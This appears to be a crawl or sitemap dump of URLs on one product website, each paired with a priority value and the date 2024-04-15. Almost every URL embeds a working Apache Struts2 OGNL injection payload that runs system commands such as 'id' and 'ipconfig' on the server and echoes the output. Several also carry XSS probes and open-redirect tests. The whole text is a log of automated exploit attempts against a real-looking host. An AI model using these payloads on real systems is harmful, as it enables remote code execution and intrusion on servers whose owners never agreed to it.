http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e%3f_002_product.html?(%27%5c43_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5c43context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5c75false%27)(d))&(%27%5c43c%27)((%27%5c43_memberaccess.excludeproperties%5c75%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5c43rp%5c75%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5c43rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5c43rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5c43rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e%3f_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'id'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e%3f_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'ipconfig'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?&class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('ipconfig').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?&redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'ipconfig','-all'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4%3f_002_product.html?xsstest 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?$%7b100002-1%2b'anonymous_'%2b'security_s2015_test'%7d.action 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3f&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?&redirect:http://www.anonymous.com/ 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3f&(aaa)((%27%5cu0023context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5cu003dfalse%27)(d))&(%27%5cu0023c%27)((%27%5cu0023_memberaccess.excludeproperties%5cu003d%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5cu0023rp%5cu003d%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(%27%5cu0023_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(grgr)((%27%5cu0023rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html/xsstest?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%27%5b%5d_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3f&redirect%3ahttp%3a%2f%2fwww.anonymous.com%2f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e%3f_002_product.html?redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'id'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'%5b%5d_002_product.html?&class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('id').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3f&z%5b(class.classloader.jarpath)(%27meh%27)%5d&class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?default.action?message=(%23_memberaccess[%27allowprivateaccess%27]%3dtrue,%23_memberaccess[%27allowprotectedaccess%27]%3dtrue,%23_memberaccess[%27excludedpackagenamepatterns%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27excludedclasses%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27allowpackageprotectedaccess%27]%3dtrue,%23_memberaccess[%27allowstaticmethodaccess%27]%3dtrue,@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(%27id%27).getinputstream())) 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'%5b%5d_002_product.html?&redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'id'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html/osm23629%e8%b0%b0o1%e5%85%b0o2a%e6%81%87coem59119?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e%3f_002_product.html?redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e%27%5b%5d_002_product.html%3f&redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html??debug=browser&object=(%23mem%3d%23_memberaccess%3d@ognl.ognlcontext@default_member_access)%3f%23context[%23parameters.rpsobj[0]].getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702):xx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%40tostring(%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()))? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'%5b%5d_002_product.html?&('%5cu0023_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5cu0023context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5cu003dfalse')(d))&('%5cu0023c')(('%5cu0023_memberaccess.excludeproperties%5cu003d@java.util.collections@empty_set')(c))&(asdf)(('%5cu0023rp%5cu003d@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5cu0023rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5cu0023rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5cu0023rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'%5b%5d_002_product.html?default.action?message=(%23_memberaccess[%27allowprivateaccess%27]%3dtrue,%23_memberaccess[%27allowprotectedaccess%27]%3dtrue,%23_memberaccess[%27excludedpackagenamepatterns%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27excludedclasses%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27allowpackageprotectedaccess%27]%3dtrue,%23_memberaccess[%27allowstaticmethodaccess%27]%3dtrue,@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(%27ipconfig%27).getinputstream())) 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'%5b%5d_002_product.html?&redirect:http://www.anonymous.com/ 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'%5b%5d_002_product.html?&redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'ipconfig','-all'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3f%3fdebug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?method:%23_memberaccess%3d@ognl.ognlcontext@default_member_access,%23context[%23parameters.obj[0]].getwriter().print(%23parameters.content[0]%2b201%2b20702),1?%23xx:%23request.tostring&obj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=tm9kz 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530%27%5b%5d_002_product.html%3f%24%7b100002-1%2b%27anonymous_%27%2b%27security_s2015_test%27%7d.action? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html/osm15417%e8%b0%b0o1%e5%85%b0o2a%e6%81%87coem31662?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'%5b%5d_002_product.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'%5b%5d_002_product.html?user.action 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530%27%5b%5d_002_product.html%3f&z%5b(class.classloader.jarpath)(%27meh%27)%5d&class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e%27%5b%5d_002_product.html%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%40tostring(%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()))? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530%27%5b%5d_002_product.html%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%40tostring(%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()))? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'%5b%5d_002_product.html?user.action 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?&('%5cu0023_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5cu0023context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5cu003dfalse')(d))&('%5cu0023c')(('%5cu0023_memberaccess.excludeproperties%5cu003d@java.util.collections@empty_set')(c))&(asdf)(('%5cu0023rp%5cu003d@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5cu0023rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5cu0023rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5cu0023rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530%27%5b%5d_002_product.html%3f&redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%2c%27-all%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?&redirect:http://www.anonymous.com/ 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?method%3a%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access%2c%23context%5b%23parameters.obj%5b0%5d%5d.getwriter().print(%23parameters.content%5b0%5d%2b201%2b20702)%2c1%3f%23xx%3a%23request.tostring&obj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=tm9kz? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3f%24%7b100002-1%2b%27anonymous_%27%2b%27security_s2015_test%27%7d.action? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3f&redirect%3ahttp%3a%2f%2fwww.anonymous.com%2f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html/fsm32529%ef%bc%9cf1%ef%b9%a5f2%ca%baf3%ca%b9fem37382?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html? 0.5 2024-04-15 